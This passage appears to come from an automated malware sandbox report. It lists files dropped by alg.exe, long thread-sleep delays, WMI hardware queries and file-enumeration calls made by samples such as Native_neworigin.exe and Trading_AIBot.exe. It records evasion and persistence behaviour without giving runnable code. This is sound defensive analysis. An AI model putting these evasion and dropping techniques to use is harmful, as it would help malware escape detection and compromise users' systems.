                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exe
                    Source: C:\Windows\System32\alg.exe  Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Install\{116021C8-78D2-448A-AAC4-399076E36F9D}\117.0.5938.149_117.0.5938.132_chrome_updater.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                    Source: C:\Windows\System32\alg.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                    Source: C:\Users\Public\alpha.pif | API coverage: 6.3 %
                    Source: C:\Users\Public\alpha.pif | API coverage: 7.8 %
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 2968 | Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -5534023222112862s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5440 | Thread sleep count: 1668 > 30
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -99872s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -99714s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -99589s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -99449s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -99172s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -98887s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -98664s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -98534s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -98299s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -98156s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -97922s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -97796s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -97527s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -97274s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -97150s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -96968s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -96825s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -96570s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -96299s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -95822s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -95662s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -95499s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -95388s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -95189s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -95047s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 5080 | Thread sleep count: 419 > 30
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -94910s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -94785s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -94641s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -94529s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -94371s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -94242s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -94117s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -93939s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4508 | Thread sleep time: -93715s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 6116 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\alg.exe TID: 7344 | Thread sleep time: -720000s >= -30000s
                    Source: C:\Windows\System32\alg.exe TID: 6104 | Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 760 | Thread sleep count: 4599 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1868 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3688 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 4772 | Thread sleep time: -220000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6040 | Thread sleep count: 284 > 30
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 2932 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 6976 | Thread sleep time: -70000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -35971150943733603s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -99890s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -99765s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -99655s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -99543s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -99437s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -99328s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -99218s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -99109s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -98999s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -98890s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -98761s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -98639s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -98527s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -98421s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -98312s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -98200s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -98093s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -97984s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -97874s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -97765s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -97656s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -97546s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -97437s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -97328s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -97218s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -97109s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -97000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -96890s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -96751s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -96625s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -96513s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -96375s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -96249s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -96134s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -96031s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -95916s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -95810s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -95703s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -95593s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -95484s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -95374s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -95265s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -95156s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -95046s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -94937s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -94828s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -94701s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -94593s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -94484s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe TID: 7324 | Thread sleep time: -94374s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 2228 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 8092 | Thread sleep time: -562620000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 8092 | Thread sleep time: -24600000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Users\Public\xpha.pif | Last function: Thread delayed
                    Source: C:\Windows\System32\alg.exe | Last function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Last function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Last function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Last function: Thread delayed
                    Source: C:\Users\user\Desktop\C6dAUcOA6M.exe | Code function: 0_2_02CF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02CF5908
                    Source: C:\Users\Public\alpha.pif | Code function: 7_2_00EF0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,7_2_00EF0207
                    Source: C:\Users\Public\alpha.pif | Code function: 7_2_00EF589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,7_2_00EF589A
                    Source: C:\Users\Public\alpha.pif | Code function: 7_2_00EF4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,7_2_00EF4EC1
                    Source: C:\Users\Public\alpha.pif | Code function: 7_2_00F03E66 FindFirstFileW,FindNextFileW,FindClose,7_2_00F03E66
                    Source: C:\Users\Public\alpha.pif | Code function: 7_2_00EE532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,7_2_00EE532E
                    Source: C:\Users\Public\alpha.pif | Code function: 15_2_00EF589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,15_2_00EF589A
                    Source: C:\Users\Public\alpha.pif | Code function: 15_2_00EF0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,15_2_00EF0207
                    Source: C:\Users\Public\alpha.pif | Code function: 15_2_00EF4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,15_2_00EF4EC1
                    Source: C:\Users\Public\alpha.pif | Code function: 15_2_00F03E66 FindFirstFileW,FindNextFileW,FindClose,15_2_00F03E66
                    Source: C:\Users\Public\alpha.pif | Code function: 15_2_00EE532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,15_2_00EE532E
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99872Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99714Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99589Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99449Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeThread delayed: delay time: 99172Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Thread delayed: delay time (ms), 29 consecutive calls: 98887, 98664, 98534, 98299, 98156, 97922, 97796, 97527, 97274, 97150, 96968, 96825, 96570, 96299, 95822, 95662, 95499, 95388, 95189, 95047, 94910, 94785, 94641, 94529, 94371, 94242, 94117, 93939, 93715
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\alg.exe | Thread delayed: delay time: 60000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe | Thread delayed: delay time (ms), 51 consecutive calls: 100000, 99890, 99765, 99655, 99543, 99437, 99328, 99218, 99109, 98999, 98890, 98761, 98639, 98527, 98421, 98312, 98200, 98093, 97984, 97874, 97765, 97656, 97546, 97437, 97328, 97218, 97109, 97000, 96890, 96751, 96625, 96513, 96375, 96249, 96134, 96031, 95916, 95810, 95703, 95593, 95484, 95374, 95265, 95156, 95046, 94937, 94828, 94701, 94593, 94484, 94374
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe | Thread delayed: delay time: 60000 (2 occurrences)
Source: C:\Windows\System32\alg.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
Source: C:\Windows\System32\alg.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
Source: C:\Windows\System32\alg.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
Source: C:\Windows\System32\alg.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Windows\System32\alg.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\System32\alg.exe | File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe
Source: xpha.pif, 00000010.00000002.1566080519.0000000002D5B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz
